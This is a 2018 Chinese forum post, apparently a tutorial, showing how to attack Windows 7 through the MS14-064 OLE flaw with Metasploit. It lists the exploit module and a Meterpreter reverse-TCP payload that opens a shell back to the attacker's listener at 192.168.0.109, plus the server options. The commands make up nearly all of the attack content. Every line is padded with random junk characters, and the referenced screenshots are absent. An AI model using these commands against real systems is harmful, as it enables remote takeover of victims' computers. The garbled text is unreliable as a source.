找回密码
 立即注册
查看: 2260|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ O" q- j' |- S. @$ c2 I1 O 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示0 W% q- L& j* Q' Q1 b

+ c; {- a4 _8 S7 u2 N3 c* E" f& Q8 E

% a2 z# z" E5 a 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ) Q& h/ |; g, h& I+ d( d

7 K; h( K/ g- `! Q0 e; h

; r/ N) Q* q. K5 F) S- e9 c7 r! L 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp; k* e- N( n5 {; ^9 c

& u# R4 O! `8 b; B# S- k! M

$ r9 L$ s/ l" u) z+ H             set AllowPowershellPrompt true ( `/ o& k0 K- |1 f6 H3 m

% T4 u; c. V+ r, T2 Y, u: l$ d

( b( R% `: V8 j& S             Set LHOST 192.168.0.109# q* W- X$ |" A( D9 s# q

+ w9 w5 y( u! i6 B

& ?/ v7 }+ |: L5 h( C, l             set SRVHOST 192.168.0.109 6 j+ k- [) ]; i. ?$ O& S' c

% k$ W- b, _$ ~9 V

. h4 n) w- A4 F5 u4 _             Set uripath share * [& I) K6 K$ ]) b

, X" C6 |$ W" ^4 p

; D- I9 d; d5 ]             Set srvport 800 h4 y$ Z; g1 T

+ }7 K+ L: G' \& X( s ]* f

( Y) o. y! e2 l" |; ]; k2 D5 `/ u   & [7 q& |! k/ B! `6 C, J" \; E

% G" h8 I! A5 x

" g5 {0 V( ?9 J7 k" G: M( y+ W  & S3 N' P: B/ D9 r: X

0 i* _4 ?- Q {' [: v. t( q4 y

7 w2 C' T' R- m& |8 ^   1 K# \3 |: q$ o$ O

. @, V6 S, F3 g* d

7 H+ e- C* H! M- k$ r2 _  / Z0 [+ Z7 m& U" R6 P( Y

5 B7 `, Z( X2 n+ D) M7 d( \

Q% m6 r1 R9 ?- [$ D   $ n3 y# Y7 L. E# ?- H

2 [" W- b# J5 g9 x, U; g) h

, }' x) y% C3 ~4 f4 T 下面我们来访问本地地址如图: ! U# s8 f. m+ c% A( C% o

1 G% q$ |* R: x9 u, R$ W& [4 U6 t

3 f9 q7 A" v$ k6 e$ v  ( g$ ^6 l8 L% h3 v" O

3 E4 D2 Y$ B- i8 V6 K" {

5 v+ F4 @7 M& L* p' A   : ?5 p+ }5 @% E8 l+ H

- ?0 b1 K. d. f8 t# h; L

2 A2 j5 e/ d" n& z! W ; R7 O' Y1 x6 G; k* @4 f, r

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表